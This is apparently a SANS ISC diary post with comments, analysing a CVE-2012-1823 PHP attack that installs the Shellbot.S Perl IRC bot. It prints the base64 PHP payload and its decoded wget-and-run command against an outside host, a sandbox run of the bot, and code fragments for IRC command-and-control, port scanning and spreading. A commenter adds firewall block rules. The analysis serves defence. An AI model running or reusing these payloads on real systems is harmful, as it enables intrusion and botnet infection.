Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Script kiddie scavenging with Shellbot.S - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Script kiddie scavenging with Shellbot.S

 

In the oldie but goodie category, reader Jon Turner sent us a fun example of old school malfeasance this morning that I'll share for your review and tactical opportunities.
 
He sent us two packets, each exhibiting the same interaction with an IP address in Latvia.
Jon conducted some nice analysis before sending the PCAP our way; I let him speak for himself:
"We've been getting pretty regularly pinged with attempts to exploit CVE-2012-1823. We're not vulnerable for a few different reasons, so I'd been ignoring it but I finally got around to pulling down a packet capture of the traffic and inspecting it. The attack attempts to disable a few security-related PHP configuration settings, disable Suhosin, and then pull down and execute a Perl script via a system call.
Though I think our attacker is a bot or script kiddie (they didn't bother to fingerprint the server and pass an attack for the right OS), the script is pretty interesting. Forefront detects it as Backdoor:Perl/Shellbot.S. There are sections of the code for joining an IRC channel for C&C, performing port scans, and automatically exploiting other systems. It looks like more than one developer was involved in writing the exploit code."
 
Let's have a little fun and dig in to Shellbot.S a bit.
 
As also described by Jon, the evil bits are still available at the URL in the base64_encoded instructions in the packets:
data='<?php eval(base64_decode('ZWNobyAic3Q0cjciLnN5c3RlbSgiY2QgL2Rldi9zaG07d2dldCBodHRwOi8
vY2tib290LmFsdGVydmlzdGEub3JnL3BocC5qcGc7IHBlcmwgcGhwLmpwZyIpLiI3aDMzbmQiOw==')); ?>'
 
If you're following along at home, use a sandboxed/isolated Linux VM that you can reset when all finished.
Via your favorite base64 encoder/decoder (I like the HackBar Firefox add-on) decode the string above and you should end up with:
echo "st4r7".system("cd /dev/shm;wget http://ckboot.altervista.org/php.jpg; perl php.jpg")."7h33nd";
 
From my Ubuntu VM I conducted the following:
 
malman@ubuntu:~$ netstat -ano | grep ESTABLISHED
No results.
 
Went and  wgot the bot code.
malman@ubuntu:~$ wget http://ckboot.altervista.org/php.jpg
--2012-07-11 13:47:41-- http://ckboot.altervista.org/php.jpg
Resolving ckboot.altervista.org... 178.63.21.200
Connecting to ckboot.altervista.org|178.63.21.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15728 (15K) [image/jpeg]
Saving to: `php.jpg'
100%[=========================================================================================>] 15,728      27.1K/s   in 0.6s   
2012-07-11 13:47:51 (27.1 KB/s) - `php.jpg' saved [15728/15728]
 
Followed orders per the base64 instructions:
malman@ubuntu:~$ perl php.jpg
 
Now we have some results, instant IRC hookup.
malman@ubuntu:~$ netstat -ano | grep ESTABLISHED
tcp        0      0 192.168.45.132:33371    83.66.116.112:6667      ESTABLISHED off (0.00/0/0)
 
My Ubuntu VM was not running an SSH daemon, I didn't even have it installed.
But line 14 of the "spreader" script defines my $processo = '/usr/sbin/sshd';
Yep, confirmed:
malman@ubuntu:~$ ps aux | grep sshd
malman   17940 96.3 0.2   6944 2592 pts/3    R    13:49   2:23 /usr/sbin/sshd
 
As Jon stated, in the code we see that the script:
1) Joins an IRC channel for C&C
my @hostauth=("localhost");
my @canais=("#consola");
chop (my $realname = 'mech');
$servidor='deadmanwalking.zapto.org' unless $servidor;
my $porta='6667';
 
2) Performs port scans
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663",
"6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
 
3) Automatically exploits unpatched PHP "opportunities" and leverages Google for some heavy lifting.
Starting at line 209:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1." seconds.");
 
Starting at line 491:
    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();      
    my $page = http_query($query);
    while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
 
A $funcarg params check also reveals that Shellbot.S included TCP, UDP, and HTTP flooding functionality.
 
There are references to this source code being reported to Securityfocus as seen in attacks as far back as 2006.
But my favorite reference in this classic-come-lately?
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this s**t a bit.
 
Script kiddie indeed.
Keep those PHP apps and instances patched, folks.
 
 
 
 
 
 
 
 
 
 

 

Russ McRee

178 Posts
ISC Handler
Thanks, I'll go ahead and add the whole netblock of that IRC server to my blocklist:

-I S**TLIST -i eth1 -s 83.66.116.0/24 -j REJECT --reject-with icmp-net-prohibited
-I S**TLIST -i eth1 -s 83.66.116.0/24 -j LOG --log-level 4 --log-prefix "IN-REJECT-ASN-12978:"
Bob Stangarone

9 Posts
Oh yeah, if you look at this post I made on a similar PHP attack:

https://www.whataboutbob.org/blog/?p=803

you'll see that the code attempts to pass a .jpg to the perl interpreter as well. Not sure how common this approach is for this kind of stuff?
Bob Stangarone

9 Posts
can you detail on how it tries to disable suhosin?
thanks.
Bob Stangarone
1 Posts

Sign Up for Free or Log In to start participating in the conversation!